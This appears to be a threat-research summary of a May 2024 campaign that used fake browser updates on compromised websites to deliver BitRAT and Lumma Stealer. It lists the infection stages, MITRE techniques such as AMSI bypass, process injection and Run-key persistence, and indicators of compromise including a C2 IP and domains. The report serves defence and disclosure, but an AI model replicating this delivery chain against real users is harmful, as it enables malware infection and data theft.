Threat Research

Fake Browser Updates delivering BitRAT and Lumma Stealer

Esentire

eSentire’s TRU detected a fake browser update campaign delivering BitRAT and Lumma Stealer via compromised pages with injected JavaScript. The operation uses a multi-stage loader chain, AMSI bypass and a Discord CDN-hosted Update.zip to download loaders and payloads and reach C2 infrastructure. #BitRAT #LummaStealer

Keypoints

  • May 2024: TRU detected fake browser updates delivering BitRAT and Lumma Stealer.
  • Infection begins on an infected webpage with injected malicious JavaScript that redirects to a fake update page.
  • The ZIP archive Update.zip is downloaded from Discord’s CDN and contains Update.js, which acts as the initial downloader for subsequent payloads.
  • A chain of PowerShell scripts retrieves and executes the loader and payloads from 77.221.151.31, with AMSI bypass and persistence via Registry Run Key.
  • The loader (.NET PE, obfuscated) loads and injects payloads into RegSvcs.exe, with four unique files (s.png, z.png, a.png, 0x.png) serving loader and payload roles.
  • BitRAT provides extensive remote access capabilities (direct/Tor, UAC exploit, persistence, and more) and uses 77.221.151.31:4444 as part of its config; Tor is listed as a process name for the payload’s setup.
  • Lumma Stealer (LummaC2 Stealer) is a Russian-speaking MAAS malware by threat actor “Shamel” (alias “Lumma”), with multiple C2 domains and data exfiltration via HTTP POST; the payload includes a non-resident loader for further delivery.

MITRE Techniques

  • [T1189] Drive-by Compromise – Infection chain began when the user visited an infected webpage containing injected malicious JavaScript code. “The infection chain began when the user visited an infected webpage containing injected malicious JavaScript code.”
  • [T1059.001] PowerShell – The ZIP archive contains several PowerShell scripts responsible for downloading and executing the next stage loader and payloads from http://77[.]221[.]151[.]31. “The ZIP archive contains several PowerShell scripts responsible for downloading and executing the next stage loader and payloads from http://77[.]221[.]151[.]31.”
  • [T1112] Modify Registry – Persistence achieved by modifying the Registry Run Key to run at startup. “modifies the Registry Run Key.”
  • [T1055] Process Injection – Payloads are loaded and executed within the RegSvcs.exe process. “loading and executing the payload within RegSvcs.exe process.”
  • [T1027] Obfuscated/Compressed Files and Information – The loader is obfuscated and uses a .NET PE with an AMSI bypass; deobfuscated and loaded into memory. “AMSI bypass, the code that leverages reflection in .NET to dynamically load and execute the payload within RegSvcs.exe process.”
  • [T1090.003] Multi-hop Proxy – BitRAT demonstrates both direct reverse connections and Tor-based connections for C2. “two modes of connections (direct reverse connection and Tor connection).”
  • [T1041] Exfiltration Over C2 Channel – The Lumma Stealer exfiltrates data to the C2 using HTTP POST requests. “The stolen data is sent to a C2 server via HTTP POST requests.”

Indicators of Compromise

  • [IP Address] BitRAT C2 – 77.221.151.31
  • [Domain] C2 domains – demonstationfukewko[.]shop, liabilitynighstjsko[.]shop, and 7 more
  • [File] Delivery artifacts – Update.zip, s.png, z.png, a.png, 0x.png

Read more: https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint